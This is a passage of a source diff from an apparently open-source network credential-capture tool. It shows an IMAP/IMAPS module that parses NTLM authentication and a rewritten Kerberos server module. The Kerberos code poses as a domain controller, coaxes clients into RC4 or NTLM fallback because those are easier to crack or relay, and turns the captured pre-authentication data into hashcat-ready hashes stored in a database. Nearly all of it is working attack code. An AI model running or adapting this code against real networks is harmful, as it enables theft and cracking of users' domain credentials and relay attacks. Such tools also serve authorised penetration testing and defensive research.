msg_type = struct.pack('<I', 2)
target_name_fields = struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
flags = b'\x05\x02\x81\xa2'
context = b'\x00' * 8
target_info_fields = struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
type2_msg = (signature + msg_type + target_name_fields + flags +
challenge + context + target_info_fields + target_name + target_info)
return type2_msg
def parse_ntlm_type3(self, type3_msg, type2_msg):
"""Parse NTLM Type 3 (Authenticate) message and extract NetNTLMv2 hash"""
try:
from binascii import hexlify
if type3_msg[:8] != b'NTLMSSP\x00':
return None
msg_type = struct.unpack('<I', type3_msg[8:12])[0]
if msg_type != 3:
return None
lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
if user_offset + user_len <= len(type3_msg):
user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
else:
user = "unknown"
if domain_offset + domain_len <= len(type3_msg):
domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
else:
domain = ""
if ntlm_offset + ntlm_len <= len(type3_msg):
ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
else:
return None
if len(ntlm_response) > 24:
ntlmv2_response = ntlm_response[:16]
ntlmv2_blob = ntlm_response[16:]
challenge = type2_msg[24:32]
hash_str = "%s::%s:%s:%s:%s" % (
user,
domain,
hexlify(challenge).decode(),
hexlify(ntlmv2_response).decode(),
hexlify(ntlmv2_blob).decode()
)
if settings.Config.Verbose:
print(text('[IMAP] NetNTLMv2 hash format (hashcat -m 5600)'))
return {
'module': 'IMAP',
'type': 'NetNTLMv2',
'client': self.client_address[0],
'user': user,
'domain': domain,
'hash': hash_str,
'fullhash': hash_str
}
else:
ntlm_hash = ntlm_response[:24]
challenge = type2_msg[24:32]
if lm_offset + lm_len <= len(type3_msg) and lm_len == 24:
lm_hash = type3_msg[lm_offset:lm_offset+lm_len]
else:
lm_hash = b'\x00' * 24
hash_str = "%s::%s:%s:%s:%s" % (
user,
domain,
hexlify(lm_hash).decode(),
hexlify(ntlm_hash).decode(),
hexlify(challenge).decode()
)
if settings.Config.Verbose:
print(text('[IMAP] NetNTLMv1 hash format (hashcat -m 5500)'))
return {
'module': 'IMAP',
'type': 'NetNTLMv1',
'client': self.client_address[0],
'user': user,
'domain': domain,
'hash': hash_str,
'fullhash': hash_str
}
except Exception as e:
return None
except Exception:
pass
class IMAPS(IMAP):
"""IMAP over SSL (port 993) - SSL wrapper that inherits from IMAP"""
def setup(self):
"""Setup SSL socket before handling - called automatically by SocketServer"""
try:
# Get SSL certificate paths from Responder config
cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if not os.path.exists(cert_path) or not os.path.exists(key_path):
if settings.Config.Verbose:
print(text('[IMAPS] SSL certificates not found'))
self.request.close()
return
# Create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert_path, key_path)
# Wrap socket in SSL before IMAP handles it
self.request = context.wrap_socket(self.request, server_side=True)
# Mark as already in TLS so STARTTLS isn't advertised
self.tls_enabled = True
if settings.Config.Verbose:
print(text('[IMAPS] SSL connection from %s' %
self.client_address[0].replace("::ffff:", "")))
except ssl.SSLError as e:
# Client rejected self-signed cert - suppress expected errors
if 'ALERT_BAD_CERTIFICATE' not in str(e) and settings.Config.Verbose:
print(text('[IMAPS] SSL handshake failed: %s' % str(e)))
try:
self.request.close()
except:
pass
except Exception as e:
if 'Bad file descriptor' not in str(e) and settings.Config.Verbose:
print(text('[IMAPS] SSL setup error: %s' % str(e)))
try:
self.request.close()
except:
pass
# handle() method is inherited from IMAP class - no need to override!

958
servers/Kerberos.py
View File

@@ -16,134 +16,868 @@
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import codecs
import struct
import time
from utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
# Kerberos encryption types
ENCRYPTION_TYPES = {
b'\x01': 'des-cbc-crc',
b'\x03': 'des-cbc-md5',
b'\x11': 'aes128-cts-hmac-sha1-96',
b'\x12': 'aes256-cts-hmac-sha1-96',
b'\x13': 'rc4-hmac',
b'\x14': 'rc4-hmac-exp',
b'\x17': 'rc4-hmac',
b'\x18': 'rc4-hmac-exp',
}
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
def parse_asn1_length(data, offset):
"""Parse ASN.1 length field (short or long form)"""
if offset >= len(data):
return 0, 0
first_byte = data[offset]
# Short form (length < 128)
if first_byte < 0x80:
return first_byte, 1
# Long form
num_octets = first_byte & 0x7F
if num_octets == 0 or offset + 1 + num_octets > len(data):
return 0, 0
length = 0
for i in range(num_octets):
length = (length << 8) | data[offset + 1 + i]
return length, 1 + num_octets
if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02':
if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
def encode_asn1_length(length):
"""Encode length in ASN.1 format"""
if length < 128:
return struct.pack('B', length)
# Long form
length_bytes = []
temp = length
while temp > 0:
length_bytes.insert(0, temp & 0xFF)
temp >>= 8
num_octets = len(length_bytes)
result = struct.pack('B', 0x80 | num_octets)
for byte in length_bytes:
result += struct.pack('B', byte)
return result
if Data[44:48] == b'\xa2\x36\x04\x34' or Data[44:48] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
elif HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
return False
def extract_principal_name(data):
"""Extract principal name from AS-REQ - searches in req-body only"""
try:
# Look for [4] req-body tag first to avoid PA-DATA
req_body_offset = None
for i in range(len(data) - 100):
if data[i:i+1] == b'\xa4': # [4] req-body
req_body_offset = i
break
if req_body_offset is None:
return "user"
# Search for [1] cname AFTER req-body starts
search_start = req_body_offset
search_end = min(search_start + 150, len(data) - 20)
for i in range(search_start, search_end):
# Look for GeneralString (0x1b) with reasonable length
if data[i:i+1] == b'\x1b':
name_len = data[i+1] if i+1 < len(data) else 0
if 1 < name_len < 30 and i + 2 + name_len <= len(data):
name = data[i+2:i+2+name_len].decode('latin-1', errors='ignore')
# Validate: printable, no control chars, looks like username
if (name and
name.isprintable() and
name.isascii() and
not any(c in name for c in ['\x00', '\n', '\r', '\t']) and
all(c.isalnum() or c in '.-_@' for c in name)):
return name
return "user"
except:
return "user"
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
def extract_realm(data):
"""Extract realm from AS-REQ - searches in req-body only"""
try:
# Look for [4] req-body tag first
req_body_offset = None
for i in range(len(data) - 100):
if data[i:i+1] == b'\xa4': # [4] req-body
req_body_offset = i
break
if req_body_offset is None:
return settings.Config.MachineName.upper()
# Search for realm AFTER req-body starts
search_start = req_body_offset + 10
search_end = min(search_start + 150, len(data) - 20)
for i in range(search_start, search_end):
# Look for GeneralString (0x1b) with reasonable length
if data[i:i+1] == b'\x1b':
realm_len = data[i+1] if i+1 < len(data) else 0
# Realm should be 5-50 chars (like "DOMAIN.LOCAL")
if 5 < realm_len < 50 and i + 2 + realm_len <= len(data):
realm = data[i+2:i+2+realm_len].decode('latin-1', errors='ignore')
# Validate: printable ASCII, contains dot, looks like domain
if (realm and
realm.isprintable() and
realm.isascii() and
'.' in realm and
realm.count('.') >= 1 and realm.count('.') <= 5 and
not any(c in realm for c in ['\x00', '\n', '\r', '\t', '/', ':', ' ']) and
all(c.isalnum() or c in '.-' for c in realm)):
return realm
return settings.Config.MachineName.upper()
except:
return settings.Config.MachineName.upper()
if MsgType == b'\x0a' and EncType == b'\x17':
if Data[40:44] == b'\xa2\x36\x04\x34' or Data[40:44] == b'\xa2\x35\x04\x33':
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
elif HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen].decode('latin-1')
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen].decode('latin-1')
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
return BuildHash
return False
def find_msg_type(data):
"""Find Kerberos message type by parsing ASN.1 structure"""
try:
offset = 0
# Check APPLICATION tag
# [10] for AS-REQ (0x6a)
# [12] for TGS-REQ (0x6c)
if offset >= len(data):
return None, False, None, None
app_tag = data[offset]
if app_tag not in [0x6a, 0x6c]: # AS-REQ or TGS-REQ
return None, False, None, None
offset += 1
# Parse outer length
length, consumed = parse_asn1_length(data, offset)
if consumed == 0:
return None, False, None, None
offset += consumed
# SEQUENCE tag
if offset >= len(data) or data[offset] != 0x30:
return None, False, None, None
offset += 1
# Parse SEQUENCE length
seq_length, consumed = parse_asn1_length(data, offset)
if consumed == 0:
return None, False, None, None
offset += consumed
# [1] pvno
if offset >= len(data) or data[offset] != 0xa1:
return None, False, None, None
offset += 1
pvno_len, consumed = parse_asn1_length(data, offset)
offset += consumed + pvno_len
# [2] msg-type
if offset >= len(data) or data[offset] != 0xa2:
return None, False, None, None
offset += 1
msgtype_len, consumed = parse_asn1_length(data, offset)
offset += consumed
# INTEGER tag
if offset >= len(data) or data[offset] != 0x02:
return None, False, None, None
offset += 1
int_len, consumed = parse_asn1_length(data, offset)
offset += consumed
if offset >= len(data):
return None, False, None, None
msg_type = data[offset]
# Extract client name and realm for KRB-ERROR response
cname = extract_principal_name(data)
realm = extract_realm(data)
return msg_type, True, cname, realm
except:
return None, False, None, None
def extract_encrypted_timestamp(data):
"""
Extract encrypted timestamp from PA-ENC-TIMESTAMP in AS-REQ
Returns: (etype, cipher_hex) or (None, None)
"""
try:
# Look for PA-ENC-TIMESTAMP pattern: a1 03 02 01 02 (padata-type = 2)
for i in range(len(data) - 60):
# Look for the specific pattern that indicates PA-ENC-TIMESTAMP
if (i + 5 < len(data) and
data[i] == 0xa1 and data[i+1] == 0x03 and
data[i+2] == 0x02 and data[i+3] == 0x01 and
data[i+4] == 0x02): # padata-type = 2
# Now find [2] padata-value which should be right after
j = i + 5
if j < len(data) and data[j] == 0xa2: # [2] padata-value
j += 1
# Parse length of padata-value
pv_len, consumed = parse_asn1_length(data, j)
j += consumed
# Inside padata-value is OCTET STRING containing EncryptedData
if j < len(data) and data[j] == 0x04: # OCTET STRING
j += 1
octet_len, consumed = parse_asn1_length(data, j)
j += consumed
# Now we're inside EncryptedData SEQUENCE
if j < len(data) and data[j] == 0x30: # SEQUENCE
j += 1
seq_len, consumed = parse_asn1_length(data, j)
j += consumed
# Look for [0] etype
if j < len(data) and data[j] == 0xa0: # [0] etype
j += 1
etype_len, consumed = parse_asn1_length(data, j)
j += consumed
# INTEGER tag
if j < len(data) and data[j] == 0x02:
j += 1
int_len, consumed = parse_asn1_length(data, j)
j += consumed
etype = data[j] if j < len(data) else None
j += int_len
# Now look for [2] cipher (OCTET STRING)
if j < len(data) and data[j] == 0xa2: # [2] cipher
j += 1
cipher_tag_len, consumed = parse_asn1_length(data, j)
j += consumed
# OCTET STRING
if j < len(data) and data[j] == 0x04:
j += 1
cipher_len, consumed = parse_asn1_length(data, j)
j += consumed
if j + cipher_len <= len(data):
cipher = data[j:j+cipher_len]
cipher_hex = cipher.hex()
return etype, cipher_hex
return None, None
except Exception as e:
if settings.Config.Verbose:
print(text('[KERB] Error extracting timestamp: %s' % str(e)))
return None, None
def find_padata_and_etype(data):
"""
Search for PA-DATA and determine encryption type
Returns: (has_padata, etype) where etype is the encryption type number or None
"""
try:
# Look for [3] PA-DATA tag (0xa3)
for i in range(len(data) - 60):
if data[i:i+1] == b'\xa3':
# Found PA-DATA, now we need to check if it contains PA-ENC-TIMESTAMP
# Structure: [3] SEQUENCE OF { [1] padata-type, [2] padata-value }
# Look for [1] padata-type within next 30 bytes
has_pa_enc_timestamp = False
padata_value_offset = None
for j in range(i, min(i + 30, len(data) - 10)):
if data[j:j+1] == b'\xa1': # [1] padata-type
# Check if padata-type = 2 (PA-ENC-TIMESTAMP)
# Pattern: a1 03 02 01 02
if j + 4 < len(data) and data[j+1:j+5] == b'\x03\x02\x01\x02':
has_pa_enc_timestamp = True
# Next should be [2] padata-value
break
if not has_pa_enc_timestamp:
# PA-DATA exists but not PA-ENC-TIMESTAMP
# This is normal for first AS-REQ
return False, None
# Now look for [2] padata-value which contains EncryptedData
for j in range(i, min(i + 50, len(data) - 10)):
if data[j:j+1] == b'\xa2': # [2] padata-value
# Inside padata-value is EncryptedData
# Now look for [0] etype inside EncryptedData
for k in range(j, min(j + 30, len(data) - 5)):
if data[k:k+1] == b'\xa0': # [0] etype
# Pattern: a0 03 02 01 <etype>
if k + 4 < len(data) and data[k+1:k+3] == b'\x03\x02':
etype = data[k+4]
if settings.Config.Verbose:
etype_name = ENCRYPTION_TYPES.get(bytes([etype]), 'unknown')
print(text('[KERB] Found PA-ENC-TIMESTAMP with etype %d (%s)' % (etype, etype_name)))
return True, etype
# Found PA-DATA but couldn't determine etype
return True, None
return False, None
except:
return False, None
def build_krb_error(realm, cname, sname=None):
"""
Build KRB-ERROR response with PA-DATA for pre-authentication
KRB-ERROR ::= [APPLICATION 30] SEQUENCE {
pvno[0] INTEGER (5),
msg-type[1] INTEGER (30),
ctime[2] KerberosTime OPTIONAL,
cusec[3] INTEGER OPTIONAL,
stime[4] KerberosTime,
susec[5] INTEGER,
error-code[6] INTEGER,
crealm[7] Realm OPTIONAL,
cname[8] PrincipalName OPTIONAL,
realm[9] Realm,
sname[10] PrincipalName,
e-text[11] GeneralString OPTIONAL,
e-data[12] OCTET STRING OPTIONAL
}
"""
# Get current time
current_time = time.time()
time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
susec = int((current_time - int(current_time)) * 1000000)
# Build sname (server name) - krbtgt/REALM@REALM
if sname is None:
sname = 'krbtgt'
# Build the inner SEQUENCE
inner = b''
# [0] pvno: 5
inner += b'\xa0\x03\x02\x01\x05'
# [1] msg-type: 30 (KRB-ERROR)
inner += b'\xa1\x03\x02\x01\x1e'
# [4] stime (server time)
# KerberosTime is GeneralizedTime (tag 0x18)
time_bytes = time_str.encode('ascii')
inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
# [5] susec (microseconds)
susec_bytes = struct.pack('>I', susec)
# Remove leading zeros
while len(susec_bytes) > 1 and susec_bytes[0] == 0:
susec_bytes = susec_bytes[1:]
inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
# [6] error-code: 25 (KDC_ERR_PREAUTH_REQUIRED)
inner += b'\xa6\x03\x02\x01\x19'
# [9] realm (server realm)
realm_bytes = realm.encode('ascii')
inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
# [10] sname (server principal name)
# PrincipalName ::= SEQUENCE { name-type[0] Int32, name-string[1] SEQUENCE OF GeneralString }
sname_str = sname.encode('ascii')
realm_str = realm.encode('ascii')
# Build name-string SEQUENCE
name_string_seq = b''
# First component: service name (krbtgt)
name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
# Second component: realm
name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
# Wrap in SEQUENCE
name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
# Build name-string [1]
name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
# Build name-type [0] - type 2 (KRB_NT_SRV_INST)
name_type = b'\xa0\x03\x02\x01\x02'
# Build PrincipalName SEQUENCE
principal_seq = name_type + name_string_tagged
principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
# Tag [10]
inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
# [12] e-data (PA-DATA)
edata = build_pa_data(realm, cname)
inner += b'\xac' + encode_asn1_length(len(edata) + 2) + b'\x04' + encode_asn1_length(len(edata)) + edata
# Wrap in SEQUENCE
sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
# Wrap in APPLICATION 30 tag
krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
return krb_error
def build_krb_error_force_ntlm(realm, cname, sname=None):
"""
Build KRB-ERROR with KDC_ERR_ETYPE_NOSUPP (14)
This forces the client to fall back to NTLM authentication
Useful when you want NetNTLMv2 hashes instead of Kerberos AS-REP:
- NetNTLMv2 is often faster to crack
- Can be relayed to other services
"""
# Get current time
current_time = time.time()
time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
susec = int((current_time - int(current_time)) * 1000000)
# Build sname (server name)
if sname is None:
sname = 'krbtgt'
# Build the inner SEQUENCE
inner = b''
# [0] pvno: 5
inner += b'\xa0\x03\x02\x01\x05'
# [1] msg-type: 30 (KRB-ERROR)
inner += b'\xa1\x03\x02\x01\x1e'
# [4] stime (server time)
time_bytes = time_str.encode('ascii')
inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
# [5] susec (microseconds)
susec_bytes = struct.pack('>I', susec)
while len(susec_bytes) > 1 and susec_bytes[0] == 0:
susec_bytes = susec_bytes[1:]
inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
# [6] error-code: 14 (KDC_ERR_ETYPE_NOSUPP) - forces NTLM fallback
inner += b'\xa6\x03\x02\x01\x0e'
# [9] realm (server realm)
realm_bytes = realm.encode('ascii')
inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
# [10] sname (server principal name)
sname_str = sname.encode('ascii')
realm_str = realm.encode('ascii')
# Build name-string SEQUENCE
name_string_seq = b''
name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
# Wrap in SEQUENCE
name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
name_type = b'\xa0\x03\x02\x01\x02'
# Build PrincipalName SEQUENCE
principal_seq = name_type + name_string_tagged
principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
# Tag [10]
inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
# [11] e-text (error description)
etext_str = "KDC has no support for encryption type"
etext_bytes = etext_str.encode('ascii')
inner += b'\xab' + encode_asn1_length(len(etext_bytes) + 2) + b'\x1b' + encode_asn1_length(len(etext_bytes)) + etext_bytes
# Wrap in SEQUENCE
sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
# Wrap in APPLICATION 30 tag
krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
return krb_error
def build_pa_data(realm, cname):
"""
Build PA-DATA sequence for pre-authentication
PA-DATA ::= SEQUENCE {
padata-type[1] Int32,
padata-value[2] OCTET STRING
}
Returns SEQUENCE OF PA-DATA with:
- PA-ETYPE-INFO2 (19) - with RC4 first, then AES256
- PA-ENC-TIMESTAMP (2) - empty
- PA-PK-AS-REQ (16) - empty
- PA-PK-AS-REP-19 (15) - empty
"""
pa_data_list = b''
# 1. PA-ETYPE-INFO2 (type 19)
pa_etype_info2 = build_pa_etype_info2(realm, cname)
pa_data_list += build_single_pa_data(19, pa_etype_info2)
# 2. PA-ENC-TIMESTAMP (type 2) - empty padata-value
pa_data_list += build_single_pa_data(2, b'')
# 3. PA-PK-AS-REQ (type 16) - empty padata-value
pa_data_list += build_single_pa_data(16, b'')
# 4. PA-PK-AS-REP-19 (type 15) - empty padata-value
pa_data_list += build_single_pa_data(15, b'')
# Wrap in SEQUENCE
return b'\x30' + encode_asn1_length(len(pa_data_list)) + pa_data_list
def build_single_pa_data(padata_type, padata_value):
"""Build a single PA-DATA entry"""
inner = b''
# [1] padata-type
type_bytes = struct.pack('>I', padata_type)
# Remove leading zeros
while len(type_bytes) > 1 and type_bytes[0] == 0:
type_bytes = type_bytes[1:]
inner += b'\xa1\x03\x02\x01' + bytes([padata_type])
# [2] padata-value (OCTET STRING)
if len(padata_value) > 0:
inner += b'\xa2' + encode_asn1_length(len(padata_value) + 2) + b'\x04' + encode_asn1_length(len(padata_value)) + padata_value
else:
# Empty OCTET STRING
inner += b'\xa2\x02\x04\x00'
# Wrap in SEQUENCE
return b'\x30' + encode_asn1_length(len(inner)) + inner
def build_pa_etype_info2(realm, cname):
"""
Build PA-ETYPE-INFO2 structure
ETYPE-INFO2 ::= SEQUENCE OF ETYPE-INFO2-ENTRY
ETYPE-INFO2-ENTRY ::= SEQUENCE {
etype[0] Int32,
salt[1] GeneralString OPTIONAL,
s2kparams[2] OCTET STRING OPTIONAL
}
Returns entries for RC4 (etype 23) first, then AES256 (etype 18)
RC4 is preferred as it's much faster to crack
"""
# Build salt for AES: REALM + username (e.g., "SMB3.LOCALlgandx")
hostname = settings.Config.MachineName.lower()
salt_aes = realm + cname.lower()
salt_aes_bytes = salt_aes.encode('ascii')
entries = b''
# Entry 1: RC4-HMAC (etype 23 = 0x17)
# RC4 doesn't use salt in ETYPE-INFO2, only etype
inner_rc4 = b''
inner_rc4 += b'\xa0\x03\x02\x01\x17' # [0] etype: 23
# No salt field for RC4
entry_rc4 = b'\x30' + encode_asn1_length(len(inner_rc4)) + inner_rc4
entries += entry_rc4
# Entry 2: AES256 (etype 18 = 0x12)
inner_aes = b''
inner_aes += b'\xa0\x03\x02\x01\x12' # [0] etype: 18
inner_aes += b'\xa1' + encode_asn1_length(len(salt_aes_bytes) + 2) + b'\x1b' + encode_asn1_length(len(salt_aes_bytes)) + salt_aes_bytes
entry_aes = b'\x30' + encode_asn1_length(len(inner_aes)) + inner_aes
entries += entry_aes
# Wrap in SEQUENCE (ETYPE-INFO2 - SEQUENCE OF entries)
etype_info2 = b'\x30' + encode_asn1_length(len(entries)) + entries
return etype_info2
class KerbTCP(BaseRequestHandler):
"""Kerberos TCP handler (port 88)"""
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
n, krb, v, name, domain, d, h = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except:
pass
# TCP Kerberos uses 4-byte length prefix (Record Mark)
length_data = self.request.recv(4)
if len(length_data) < 4:
return
# Parse Record Mark (big-endian, high bit reserved)
msg_length = struct.unpack('>I', length_data)[0] & 0x7FFFFFFF
# Receive the Kerberos message
data = b''
while len(data) < msg_length:
chunk = self.request.recv(msg_length - len(data))
if not chunk:
return
data += chunk
# Parse Kerberos message
msg_type, valid, cname, realm = find_msg_type(data)
if not valid:
if settings.Config.Verbose:
print(text('[KERB] Invalid Kerberos message'))
return
if msg_type == 10: # AS-REQ
# Check operation mode
kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
# Check if client sent PA-DATA
has_padata, etype = find_padata_and_etype(data)
if has_padata and etype:
# Client sent pre-auth data - extract the encrypted timestamp
etype_num, cipher_hex = extract_encrypted_timestamp(data)
if etype_num and cipher_hex:
etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
if settings.Config.Verbose:
print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
# Build the hash in hashcat format
if etype_num == 0x17 or etype_num == 0x18: # RC4 (23 = 0x17, 24 = 0x18)
# RC4 format: $krb5pa$23$user$realm$dummy$hash
# Flip: last 36 bytes + first 16 bytes (per Responder's ParseMSKerbv5TCP)
if len(cipher_hex) >= 32:
first_16_bytes = cipher_hex[0:32] # First 16 bytes
rest = cipher_hex[32:] # Rest (36 bytes)
flipped_hash = rest + first_16_bytes
hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
else:
hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
elif etype_num == 0x12: # AES256 (18) - hashcat mode 19900
# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
elif etype_num == 0x11: # AES128 (17) - hashcat mode 19800
# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
else:
hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
# Log to database
SaveToDb({
'module': 'Kerberos',
'type': 'AS-REQ',
'client': self.client_address[0],
'user': cname,
'domain': realm,
'hash': hash_value,
'fullhash': hash_value
})
# Print the hash
if settings.Config.Verbose:
if etype_num == 0x17 or etype_num == 0x18:
print(text('[KERB] Use hashcat -m 7500 (etype 23): %s' % hash_value))
elif etype_num == 0x12:
print(text('[KERB] Use hashcat -m 19900 (etype 18): %s' % hash_value))
elif etype_num == 0x11:
print(text('[KERB] Use hashcat -m 19800 (etype 17): %s' % hash_value))
else:
print(text('[KERB] Kerberos hash (etype %d): %s' % (etype_num, hash_value)))
else:
if settings.Config.Verbose:
print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
else:
# First AS-REQ without pre-auth
if kerberos_mode == 'FORCE_NTLM':
# Force NTLM fallback mode
if settings.Config.Verbose:
print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
# Build KRB-ERROR with ETYPE_NOSUPP
krb_error = build_krb_error_force_ntlm(realm, cname)
# Send with Record Mark
response = struct.pack('>I', len(krb_error)) + krb_error
self.request.sendall(response)
if settings.Config.Verbose:
print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
# Log to database
SaveToDb({
'module': 'Kerberos',
'type': 'NTLM-Fallback-Forced',
'client': self.client_address[0],
'user': cname,
'domain': realm,
'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
})
